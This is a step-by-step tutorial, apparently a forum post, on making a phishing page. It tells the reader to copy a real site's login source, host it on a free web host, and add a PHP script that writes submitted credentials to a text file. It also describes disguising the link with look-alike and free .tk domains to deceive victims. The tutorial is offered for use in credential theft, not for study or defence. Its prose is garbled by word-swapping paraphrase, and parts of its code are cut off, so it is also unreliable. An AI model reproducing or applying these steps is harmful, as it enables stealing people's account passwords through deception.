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This is an essential instructional exercise on the most proficient method to make a

phishing page.

What is a phisher? - 101
Making a T35 Account - 102
Getting Web pages Source Code - 103
Making Phish File - 104
Instructions to trick individuals - 105
What is a phisher? 101

A phisher is a phony login page used to get close enough to someones account. At
the point when somebody signs into the phony login page, there secret word is
shipped off you.

Making a T35 Account 102

To make a phisher, you want a web facilitating website, I suggest T35. Join with a
free acount and title it (websiteyourgonnaphish) For instance: Most likeley, it is taken so add numbers like 08, or 07.

Getting Web Pages Source Code 103

After you make that page, go to the site you will make a phisher for. Open the
login page, From there right-click the page, and snap View Source. Reorder what has
sprung up.

Making Phish File 104

When you have that duplicated, go to your T35 account. Click on "New File" Title
it login.htm Then glue your Source Code you duplicated from 104. Save it.

Presently make another record, title it fhish.php And inside, glue this code:


$handle = fopen("thepasses.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

The is what the page goes to after the casualty

signs in, change that to what exactly wanted

Save the document.

Return to your login.htm document and snap alter. Press CTRL+F and type in action=
in the container. Continue squeezing find until you find something that says
action=(something that has to do with signing in). Supplant that with fhish.php.
Congrats, you have a phisher!

The most effective method to trick individuals - 105
What you do now is camouflage your connection. Utilize this code:

That is the connection to your phishing page. At the point when individuals login
to that, you will get the secret key in a password.txt document that will be made
when somebody types something into it. However, you need to deceive individuals.
Utilize this code.

*genuine site name*.com/login.php

You do likewise for any discussion!

Much obliged to you for perusing! Trust it makes a difference! On the off chance
that I was missing something, or you have any inquiries, PM me!


Additionally, to utilize, use and after you transferred

everything, go to and pick a free .tk space name.

Credits: Rockey Killer

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